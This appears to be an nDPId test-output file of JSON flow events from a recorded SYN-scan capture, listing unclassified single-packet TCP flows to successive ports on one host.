+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 